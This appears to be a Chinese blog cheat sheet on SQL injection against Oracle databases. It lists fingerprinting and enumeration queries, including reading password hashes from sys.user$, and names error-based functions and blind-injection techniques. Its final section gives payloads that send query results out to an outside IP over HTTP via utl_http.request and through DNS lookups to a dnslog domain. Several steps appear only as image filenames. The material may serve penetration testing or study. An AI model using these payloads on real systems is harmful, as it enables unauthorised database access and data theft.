oracle盲注获取字段,SQL注入小结(Oracle) | 码农网

0x00 判断 数据库 类型

Oracle有一些自带的表:dual、user_tables id=45 and (select count(*) from user_tables)>0--

id=45 and (select count(*) from dual)>0--

利用自带的一些函数:譬如utl_http.request 这些

利用 Oracle 的字符连接符:CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(49)||CHR(61)||CHR(49)

0x01 基本信息获取

查看sid select instance_name from v$instance;

查看数据库版本: select banner from v$version where rownum=1;

select banner from sys.v_$version where rownum=1;

查看用户: select user from dual; --当前用户

select username from user_users; --当前用户

select username from all_users; --查看所有用户

select username from dba_users; --查看所有用户(需要有权限)

查看当前用户角色: select role from session_roles;

查看数据库用户名和密码: select name, password, astatus from sys.user$; --需要权限

通过注入获取数据 --列database

select global_name from global_name;

select sys.database_name from dual;

select name from v$database;

select instance_name from v$instance;

--列owner

select distinct owner from all_tables;

--列owner的tables

select table_name from all_tables where owner='UTEST';

--列tables的columns

select column_name from all_tab_columns where table_name='TUSER';

select column_name from all_tab_cols where table_name='TUSER';

--列tablespace

select tablespace_name from user_tablespaces;

--列tablespace的tables

select table_name from user_tables where tablespace_name='DB_TEST_DATA';

--列tables的columns

select column_name from user_tab_columns where table_name='TUSER';

0x02 UNION query注入

存在注入

e1aff36653ddd5f1a83507e63a4e0508.png

判断列数

071af0177fbf4a8c3d5513f5718f0583.png

97f425c3540e9aba766ce6d2e964949f.png

尝试union select

6d02229fd35c22a8ee855a1a98544679.png 依次判断字段类型(下图判断出第二个字段是字符型)

7ba7ab1a1150103a0c3d7c7d44518ece.png

84f617ada759c4be2059a3affb4e1f6f.png

得到表名 得到表的个数

bbbf91e9f95d89a7b974b110aa7acf9e.png 得到第一个表的表名

57ababf809edc5f4d3bbca91baa434bd.png 得到第二个表的表名

cacc101c6a6294c2ae6b3addcfb98293.png

得到第一个表的字段

c4cacaeda6a868d5d4948d222f96b8e3.png

得到第一个表的数据

71a4519d908ce3017df3c740b65682cf.png

0x03 error-based注入

ctxsys.drithsx.sn

d724a708af31c534b1838cde125f028b.png

dbms_xdb_version.checkin

a9c32dcd4cb7bbe68e6573b779683793.png

dbms_xdb_version.makeversioned

704d871f1679e90df7d5a5ace8c4dec1.png

dbms_xdb_version.uncheckout

363d36239c8253cc300a9959d93dbd71.png

dbms_utility.sqlid_to_sqlhash

d37d2b3a453a32155ba509a4007e8666.png

utl_inaddr.get_host_name(在11g以后需要是超级用户或已授予网络访问权限的用户才能使用)

dbab312b05e1e0e44385596f9652dca4.png

0x04 boolean-based blind注入

decode

decode(条件,值1,值1结果,值2,值2结果,。。。值n,值n结果,默认值)

条件和那个值相等就返回那个值的结果

d157f4942cee0c540bfb28a758542ea0.png

a60d3ca781b29e8378516d235c3a78b2.png

instr

instr(字符串,子串)

从一个字符串中查找指定子串的位置,这里一直将位置置为1

b61a98177d50d6b178a4c24c4ee79828.png

14d80215b0687786d678841434f784b5.png

0189bbb81edaeafe91a6a630a6e6c74d.png

0x05 无回显注入

web服务接收结果 select * from utest.msg where id=2 and 1=utl_http.request('http://59.108.35.198:8888/'||(select user from dual));

dns服务接收结果 select * from utest.msg where id=2 and (select utl_inaddr.get_host_address((select user from dual)||'.dnslog.wyb0.com') from dual) is not null;

Reference(侵删):

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值